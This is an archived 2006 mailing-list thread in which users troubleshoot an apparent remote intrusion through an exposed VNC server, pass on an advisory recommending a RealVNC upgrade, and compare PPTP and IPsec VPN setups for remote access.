>> found nothing at all.
>>
>> Also, still no intrusions with any one or more of the following true:
>> VNC stopped
>> network disconnected
>> logged out
>>
>>
>>> Checked with sysinternal autorun.exe, found nothing suspicious. I'm
>>> pretty
>>> sure it has something to do with VNC: This issue occurs with my 3
>>> machines
>>> with VNC server installed every a few minutes intermittently. After I
>>> closed
>>> VNC server, seems it won't occur for now.
>>>
>>> Any final solution for this?
>>> pe a
>>>
>>>
>> I'm convinced there is no virus in the machine and it seems someone is
>> trying to (manually?) type a command in the Start/Run box as if they are
>> sitting in front of the computer.
>>
>> So, that sorta leaves VNC except I have it running as a Service which
>> means if someone was using VNC they could still use it when all users
>> are logged out except they can't login cause I have a strong password.
>> I have 3 machines with VNC but only one is forwarded to from the
>> router. That's the one that's being compromised.
>>
>> Now I'm investigating my Wi-Fi nodes.
>>
>> Carey
>> --
2006\10\11@093308
by
Gerhard Fiedler
Orin Eman wrote:
>> A PPTP connection is set up pretty quickly on any recent Windows PC, and
>> doesn't need a special router. (Most let it pass, for one connection at
>> least.)
>
> Whether it works or not is a different matter...
>
> Sorry for the rant, but my copy of XP at home can't handle a bad
> packet during the PPTP startup and just sits and sulks. A Win2k
> virtual machine under Vmware on Gentoo Linux however works fine...
Well, yes, YMMV :)
FWIW, I use PPTP regularly to connect to my home LAN (SMC router with
built-in VPN server) from my WinXP Pro notebook, and I never had a problem.
Gerhard
2006\10\11@144340
by
Richard Prosser
As does UltraVNC.
RP
On 11/10/06, Philip Pemberton <RemoveMEpiclistEraseME
EraseMEphilpem.me.uk> wrote:
{Quote hidden}> Orin Eman wrote:
> > That's what Laplink Everywhere does... it's not free though. It uses
> > a Java VNC viewer to try to cover as many client operating systems as
> > possible - if you have access to a Java enabled browser, you can
> > access your VNC server.
>
> TightVNC has a built-in HTTP server and Java client, too. IIRC it runs on port
> 5800.
>
> --
> Phil. | (\_/) This is Bunny. Copy and paste Bunny
>
RemoveMEpiclistspam_OUT
KILLspamphilpem.me.uk | (='.'=) into your signature to help him gain
>
http://www.philpem.me.uk/ | (")_(") world domination.
> -
2006\10\11@202439
by
Carey Fisher
Bob Axtell wrote:
> Frank Niu wrote:
>
>> I got a announcement about this issue. It is indeed a VNC-related security
>> problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2)
>>
>> **********************************
>> There is a known exposure in some versions of the popular program VNC by
>> which an attacker can get past the password protection and compromise the
>> system. It was found in the "RealVNC" version and an upgrade which fixes
>> this exposure is available. Other versions of VNC may or may not be
>> affected.
>>
>>
> That's a very important catch, Frank. Thanks!
>
> --Bob
>
>
Yes, thanks Frank!
Carey
2006\10\11@202607
by
Carey Fisher
Gerhard Fiedler wrote:
{Quote hidden}> Orin Eman wrote:
>
>
>>> A PPTP connection is set up pretty quickly on any recent Windows PC, and
>>> doesn't need a special router. (Most let it pass, for one connection at
>>> least.)
>>>
>> Whether it works or not is a different matter...
>>
>> Sorry for the rant, but my copy of XP at home can't handle a bad
>> packet during the PPTP startup and just sits and sulks. A Win2k
>> virtual machine under Vmware on Gentoo Linux however works fine...
>>
>
> Well, yes, YMMV :)
>
> FWIW, I use PPTP regularly to connect to my home LAN (SMC router with
> built-in VPN server) from my WinXP Pro notebook, and I never had a problem.
>
> Gerhard
>
Gerhard,
I like your approach and am going to try it - VPN server-in-router at
main location, setup PPTP at the other end.
Thanks,
Carey
2006\10\12@091335
by
Gerhard Fiedler
Carey Fisher wrote:
> I like your approach and am going to try it - VPN server-in-router at
> main location, setup PPTP at the other end.
FWIW, my router supports also IPsec. However, I find PPTP has generally
worked well for me and it is very quick and easy to set up on Win2k+
systems without any additional software.
Gerhard
More... (looser matching)
- Last day of these posts
- In 2006
, 2007 only
- Today
- New search...